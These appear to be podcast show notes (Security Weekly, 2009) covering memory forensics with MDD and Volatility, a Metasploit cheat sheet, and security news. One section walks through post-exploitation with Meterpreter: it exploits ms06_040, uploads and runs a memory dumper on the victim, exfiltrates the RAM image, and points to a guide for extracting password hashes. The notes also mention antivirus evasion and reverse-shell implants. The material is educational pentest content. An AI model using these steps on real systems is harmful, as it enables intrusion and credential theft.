- 1 Security Weekly was nominated for the 2015 Best Security Podcast! Please vote for our show here: Security Blogger Awards
- 2 Sponsors
- 3 Announcements & Shameless Plugs
- 4 Episode Media
- 5 Special Guest: Marcus Carey
- 6 Memory Analysis: The Good vs. The Bad
- 7 Tech Segment: Metasploit Cheat Sheet
- 8 Stories For Discussion
- 9 Other Stories of Interest
Security Weekly was nominated for the 2015 Best Security Podcast! Please vote for our show here: Security Blogger Awards
- Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
- Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
- Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!
Announcements & Shameless Plugs
Welcome to Security Weekly, Episode 142, recording Thursday February 26th, 2009
- Late Breaking Computer Attack VectorsSponsored by Core Security Technologies - March 25, 2009
- Wireless Intrusion Detection Tactics - This is a hands-on workshop!
- Security Weekly SANS Click-Through - Go there, register for convenient and informative training! Go now or we mess with your meatware!
- SANS Orlando, podcast, Metadata presentation and WIDS workshop.
- SANS Saskatechewan - Larry is teaching the 6 day wireless track (SEC 617) in Regina on March 23 - 28, 2009. Come warm up his Shmooball cannon!
- SANS Orlando, podcast, Metadata presentation and WIDS workshop.
You can find out about all of our events at http://securityweekly.com/events/
- commandlinekungfu.com - Ed Skoudis, Hal Pomeranz and the Security Weekly team have teamed-up to bring you a new blog that focuses on command-line tips and tricks for Windows, Linux and Mac OS X.
Special Guest: Marcus Carey
Marcus J. Carey is the founder of the Sun Tzu Data, a Mid-Atlantic based Information Technology firm which specializes in Network Engineering, Network Defense Strategies, and Incident Response.
Prior to starting Sun Tzu Data, Marcus was employed by Computer Sciences Corp. (CSC) Global Security Solutions (GSS) organization. Marcus was assigned to the DC3's Defense Cyber Crime Investigations Training Academy (DCITA) as a Researcher and Instructor. Marcus' specialty at DCITA was Network Intrusions, Log Analysis, and Data Forensics.
Marcus served over eight years in the U.S. Navy Cryptologic Security Group. Marcus ended his naval service by being assigned to the National Security Agency (NSA) where he engineered, monitored, and defended Department of Defense's secure networks. Marcus has also earned a Master of Science in Network Security from Capitol College in Laurel, Maryland.
Reality Security Blog - Marcus' Blog
DojoSec - DojoSec is an exclusive Information Assurance Briefing and Training community founded by Marcus J. Carey. DojoSec is popular for its monthly briefings which provide a sampling of a major security conference in one night. DojoSec’s Monthly Briefings audience has seen talks by Johnny Long, Ron Gula, Joseph McCray, and Bruce Potter to name a few speakers. Attendees enjoy technical demonstrations, industry expert speakers, and a meal. It’s like a dinner theater for security geeks!
DojoSec Multimedia Archive - Video from past DojoSec events
Memory Analysis: The Good vs. The Bad
By Marcus J. Carey
Memory Analysis is at the bleeding edge of Incident Response and Data Forensics. Memory Analysis allows a first responder image the memory, which can reveals artifacts left by an intruder. Like many good security practices, Memory Analysis can also be used by the bad guys.
Imaging Memory with MDD
ManTech Memory DD (MDD) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.
After downloading MDD from the Mantech site you need to run the program at the command line.
MDD Command Line Usage:
mdd -o OUTPUTFILENAME
C:\tools\mdd>mdd -o memory.dd -> mdd -> ManTech Physical Memory Dump Utility Copyright (C) 2008 ManTech Security & Mission Assurance -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w' This is free software, and you are welcome to redistribute it under certain conditions; use option `-c' for details. -> Dumping 255.48 MB of physical memory to file 'memory.dd'. 65404 map operations succeeded (1.00) 0 map operations failed took 21 seconds to write MD5 is: a48986bb0558498684414e9399ca19fc
The output file is commonly referred to as an "image" . MDD function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.
Analyzing Memory with Volatility Framework
Per Volatile Systems "The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples."
Volatility does not work with Windows Vista, however since many enterprises are still running Windows XP it can come in very handy. In order to practice analyzing memory with Volatility, I recommend you download the memory samples from NIST's website. I used the file "xp-laptop-2005-07-04-1430.img", which is contained in the NIST samples, in the examples that follow.
Original reference to Windows Python:
Example reference to Unix/Linux Python:
If you need to change permissions in Unix/Linux type:
bash#chmod +x volatility
For options type:
To see date and time of memory image:
bash-3.2# ./volatility datetime -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img Image local date and time: Mon Jul 04 14:30:32 2005
Show the image information:
bash-3.2# ./volatility ident -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img Image Name: /Volumes/OBI-TOO/Memory Images/xp-laptop-2005-07-04-1430.img Image Type: Service Pack 2 VM Type: nopae DTB: 0x39000 Datetime: Mon Jul 04 14:30:32 2005
To obtain a process list:
bash-3.2# ./volatility pslist -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img Name Pid PPid Thds Hnds Time System 4 0 62 1133 Thu Jan 01 00:00:00 1970 smss.exe 400 4 3 21 Mon Jul 04 18:17:26 2005 csrss.exe 456 400 11 551 Mon Jul 04 18:17:29 2005
Show connection information:
bash-3.2# ./volatility connections -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img Local Address Remote Address Pid 127.0.0.1:1037 127.0.0.1:1038 3276 127.0.0.1:1038 127.0.0.1:1037 3276
Show all connections:
bash-3.2# ./volatility connscan -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img Local Address Remote Address Pid ------------------------- ------------------------- ------ 192.168.2.7:1147 126.96.36.199:80 3276 192.168.2.7:1145 188.8.131.52:80 368 184.108.40.206:18776 220.127.116.11:19277 2167698096 127.0.0.1:1038 127.0.0.1:1037 3276 127.0.0.1:1037 127.0.0.1:1038 3276 192.168.2.7:1130 18.104.22.168:80 368 192.168.2.7:1144 22.214.171.124:80 368 127.0.0.1:1038 127.0.0.1:1037 3276 127.0.0.1:1038 127.0.0.1:1037 3276 127.0.0.1:1038 127.0.0.1:1037 3276 bash-3.2#
bash-3.2# ./volatility procdump -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img ---- Snip ---- bash-3.2# ls AUTHORS.txt executable.1104.exe executable.1844.exe executable.2588.exe executable.524.exe forensics vtypes.py CHANGELOG.txt executable.1272.exe executable.1860.exe executable.2692.exe executable.536.exe memory_objects vtypes.pyc CREDITS.txt executable.1356.exe executable.2196.exe executable.3128.exe executable.680.exe memory_plugins vutils.py LEGAL.txt executable.1380.exe executable.2392.exe executable.3192.exe executable.712.exe setup.py vutils.pyc LICENSE.txt executable.1440.exe executable.2456.exe executable.3256.exe executable.760.exe thirdparty MANIFEST executable.1484.exe executable.2472.exe executable.3276.exe executable.800.exe vmodules.py MANIFEST.in executable.1548.exe executable.2480.exe executable.3300.exe executable.840.exe vmodules.pyc PKG-INFO executable.1564.exe executable.2496.exe executable.400.exe executable.932.exe volatility README.txt executable.1588.exe executable.2524.exe executable.456.exe executable.972.exe vsyms.py README.win executable.1640.exe executable.2548.exe executable.480.exe executable.992.exe vsyms.pyc
Check out SANS Forensics Blog for great post on finding hidden processes with Mandiant's Memoryze.
Stealing Memory with Metasploit's Meterpreter and MDD
After launching an exploit and receiving a Meterpreter connection, upload MDD.
meterpreter > upload /root/mdd.exe . [*] uploading : /root/mdd.exe -> . [*] uploaded : /root/mdd.exe -> .\mdd.exe meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS 40777/rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings 100444/r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS 100444/r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS 100555/r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM 40555/r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files 40777/rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information 40777/rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS 100666/rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini 100777/rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe 100444/r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr 100666/rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys
Execute MDD to capture RAM on the victim machine.
meterpreter > execute -f "cmd.exe" -i -H Process 1908 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. c:\>mdd.exe -o memory.dd mdd.exe -o memory.dd -> mdd -> ManTech Physical Memory Dump Utility Copyright (C) 2008 ManTech Security & Mission Assurance -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w' This is free software, and you are welcome to redistribute it under certain conditions; use option `-c' for details. -> Dumping 511.48 MB of physical memory to file 'memory.dd'. 130940 map operations succeeded (1.00) 0 map operations failed took 23 seconds to write MD5 is: be9d1d906fac99fa01782e847a1c3144 c:\>
Verify memory image has been captured.
meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS 40777/rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings 100444/r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS 100444/r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS 100555/r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM 40555/r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files 40777/rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information 40777/rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS 100666/rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini 100777/rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe 100666/rw-rw-rw- 536330240 fil Thu Jan 01 00:00:00 +0000 1970 memory.dd 100444/r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr 100666/rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys
Download memory using Meterpreter.
meterpreter > download memory.dd . [*] downloading: memory.dd -> . [*] downloaded : memory.dd -> ./memory.dd meterpreter > exit [*] Meterpreter session 1 closed. msf exploit(ms06_040_netapi) > ls *.dd [*] exec: ls *.dd memory.dd msf exploit(ms06_040_netapi) >
Now you can utilize instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the password dump out of memory.
- MDD http://www.mantech.com/msma/MDD.asp
- Volatility https://www.volatilesystems.com/default/volatility
- NIST Memory Samples http://www.cfreds.nist.gov/mem/memory-images.rar
- SANS Forensics http://sansforensics.wordpress.com/2008/11/19/memory-forensic-analysis-finding-hidden-processes/
- Mandiant Memoryze http://www.mandiant.com/software/memoryze.htm
- py2exe http://www.py2exe.org
- cwsandbox http://www.cwsandbox.org/
- NSRL http://www.nsrl.nist.gov/
- BinText http://www.foundstone.com/us/resources/proddesc/bintext.htm
Tech Segment: Metasploit Cheat Sheet
Metasploit Cheat Sheet - Based on my recent teaching of the Metasploit course for SANS, this is a collection of tips and tricks for Metasploit. Many have been discussed on the podcast before, and some have not. I've included mini-tutorials and links to tech segments on:
- WPAD Mitm Attacks and smb_relay
- Incognito Token Passing
- Bypassing Anti-Virus with msfpayload and msfencode
- Meterpreter information gathering extensions (Darkoperator)
- db_autopwn usage and tips
I think I may replace the screenshots with actual text so people can copy paste, but then on the other hand its good practice to enter the commands manually.
www.oldapps.com - Repository of older applications available for free download.
Stories For Discussion
1) Bill proposes ISPs, Wi-Fi keep logs for police - [PSW] - Proposed federal law that would require ISPs, hotels, Wi-FI hot spots, and home users to keep user records for two years to aid police investigations.
2) WHY Netgear, WHY! - [Larry] - Wow, this is a trivial Admin interface DoS. How trivial? Add a "?" to the end of the admin url, and the interface becomes available until a reboot. The device still functions, but there is no way to manage it.
3) Shame on Cisco - [Larry] - Nice, want to manage the ACE Application Control Engine Device Manager remotely? It should be easy, as Cisco included default usernames and passwords for the application and the MySQL database backend. During install, there is no prompting to change them. Wow, being able to take control of a web app load balancer and Cisco 6500 and 7000 series switch has some interesting possibilities for attacks...
4) GPS anyone - [Larry] - I found this use of GPS interesting, given that consumer GPS nav units appear to have been forensically analyzed to determine recorded locations to prosecute folks in crimes. What about utilizing GPS for other information gathering. See next week...
5) SheevaPlug - [Larry] - This looks like a promising platform for a bunch of penetration type tasks. How about a $50 - $100 linux box self contained in a wall wart type form factor - ethernet, and USB ports available (looks like SD card as well. I can envision using a device like this for remote wireless assessment (hiding a rogue anyone?) vis a USB wireless dongle. How about a pivot point for dropping on a customer LAN?
7) MS fixing autorun disable - [Larry] - Thanks microsoft. We talked about this during some of our Conficker/Downadup conversations.
8) Web Application Incident Handling - [John] - One of the great tragedies of information security is that it has been reduced to a series of tools that we rely on as professionals. IDS/IPS, SIM, AV... Many of us have become far to dependent on a specific set of tools. The inverse is also true. If there is not a tool that "Does it for us" we tend to not look at that specific area of our network. Web applications are no exception. This is a great post by the folks at ts/sci. It will get you started in how to approach your web applications logs, and some cool tools to help.
9) Consumer Data Losses: 100 Times Worse According to New Report - [John] - A good read. Don't let all of the the statistics and math scare you off. The author is an academic and I don't hold that against him. What I want you to read and focus on is this; many of the reported breaches we deal with are from medium and large organizations. We hear very little about smaller organizations. Is that because they are more secure? I think not.
10) M$ is looking to kill autorun - [John] - We have discussed the various problems of autorun for a few years now. It looks like conflicker/downandup has pushed MS to the edge. I hate to say it but I am a bit sad. Yea it is great for security, but I have used this on quite a few pentests. I know that is selfish.... But.. Sniff...
11) Pwn2Own 2009 style - [John] - The pwn2own is up. Basically, you hack it, and you make some money. I like how the surface is being expanded this year. Rather then simply attacking OSes they are going after browsers (which was one of the attack vectors from last year) and.... Mobile devices!!! Sweet! I see this as one of the next big areas in IT security. Hopefully, this leads to a bit more exposure to the topic of mobile device security. Looks like CanSec West will be hopping this year.
12)Digital TV and Personal Information - [John] - Another great blog post from Sherri. Apparently the discount cards they are giving out to people have their names encoded on the Mag strip. But I am sure that the retailers need to protect that data.... Right?
13) Getting To Know Your Inner Command Line Kung Fu - [Paul] - We've teamed up with some incedibly smart people, Ed Skoudis & Hal Pomeranz, to create the ultimate resource for command line Kung Fu. The goal is to provide useful commands, be cross platform, and have each member comment and improve/modify each other's commands. Its the only site that I've seen attempting to cover commands on each platform. For example, Ed will post a Windows command, then Hal and I will discuss how to do it on UNIX/Linux. We are limiting ourselves to OS commands, with a few exceptions (But no perl or Windows Power Shell). Props to Byte_Bucket for helping to administer and moderate.
14) Adobe Vulnerability Was Known For Months - [Paul] - If you are one of the people knocking Sourcefire for posting information about this vulnerability, SHAME on you. When you can provide concrete evidence that the attackers do not have an exploit for a vulnerability, come talk to me. Did you interview all the underground attackers? The arguement just doesn't hold water. If a 0day exploit is in the wild, the community needs to know enough information to defend themselves. Hey, sometimes that leads to an exploit that is more prevelent, but at least we can defend ourselves. Keeping 0day's a secret only hurts us more, how many people were pwned before this became public? How do you even collect that information on an exploit thats months old? How many people formatted Grandma's computer and had her sign up for fraud alert in that time? Oh, and then Adobe falls flat on its face and doesn't release a patch so Sourcefire releases one for them. Just aweful!
15) Pwn2Own Mobile Phones Edition - [Paul] - This is right on, so many people are using mobile phones to browse the web, its time we brought attention to the vulnerabilities that exist.
16) Cool Command: Connect Mic to remote speaker - [Paul] - This is a neat little command that will take input from mic and output it to the speakers of a remote Linux computer. Imagine on a pen test, "I own your computer, to get it back you must dance for me, dance for me fool, dance!" Of course owning the webcam is a must in this situation as well.
17) Wyndham Hotels Hacked - [Paul] - I love this part "The breach was the result of an attacker using a "centralised network connection" at one of the franchises, to access and download the information from 41 Wyndham properties.". So this means that someone lived near one of these hotels and used the wireless to access the entire corporate network. Or, even better, implant a device inside the hotel (in the wall jack) and have it provide a reverse shell, and hack in that way. In either case there are certain organziations, like hotels, that cannot afford to have a chewy center. There is too much at risk, and its too easy for attackers to gain access to the internal network. They should *completely* separate the guest networks from corporate networks, however that doesn't stop someone from hacking into a switch, or pwning one of the management computers from some other mechanism (USB thumb drive, wireless).
18) CCCKC Hacking Event - [Paul] - If you are in KC, you should check this out.
Other Stories of Interest
WiFi Speed Spray (tm) - [IRC] - This revolutionary product is guaranteed to enhance the transfer of computer data through the air.